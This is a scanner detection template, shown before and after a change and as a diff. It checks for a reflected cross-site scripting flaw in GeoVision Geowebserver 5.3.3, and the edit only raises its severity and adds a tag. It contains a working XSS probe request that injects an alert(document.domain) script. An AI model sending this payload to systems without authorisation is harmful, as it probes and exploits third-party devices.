vulnerabilities/other/geovision-geowebserver-xss.yaml (before)
id: geowebserver-xss

info:
  name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: geowebserver,xss

requests:
  - raw:
      - |
        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html

# Enhanced by mp on 2022/07/27

vulnerabilities/other/geovision-geowebserver-xss.yaml (after)
id: geowebserver-xss

info:
  name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
  author: madrobot
  severity: high
  description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
  reference:
    - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  tags: geowebserver,xss,packetstorm

requests:
  - raw:
      - |
        GET /Visitor/bin/WebStrings.srf?file=&obj_name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1
        Host: {{Hostname}}
        Accept: */*

    matchers-condition: and
    matchers:

      - type: regex
        regex:
          - "</script><script>alert(document.domain)</script>"
        part: body

      - type: status
        status:
          - 200

      - type: word
        part: header
        words:
          - text/html

# Enhanced by mp on 2022/07/27

vulnerabilities/other/geovision-geowebserver-xss.yaml (diff)
@@ -3,7 +3,7 @@ id: geowebserver-xss
 info:
   name: GeoVision Geowebserver 5.3.3 - Cross-Site Scripting
   author: madrobot
-  severity: medium
+  severity: high
   description: GeoVision Geowebserver 5.3.3 and prior versions are vulnerable to several cross-site scripting / HTML injection / local file inclusion / XML injection / code execution vectors because the application fails to properly sanitize user requests.
   reference:
     - https://packetstormsecurity.com/files/163860/geovisiongws533-lfixssxsrfexec.txt
@@ -11,7 +11,7 @@ info:
     cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cwe-id: CWE-22
-  tags: geowebserver,xss
+  tags: geowebserver,xss,packetstorm
 
 requests:
   - raw:
